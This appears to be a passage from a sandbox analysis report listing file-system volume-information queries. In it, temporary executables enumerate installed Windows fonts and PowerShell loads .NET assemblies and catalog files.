Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\9415.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Users\user\AppData\Local\Temp\31F4.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\31F4.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
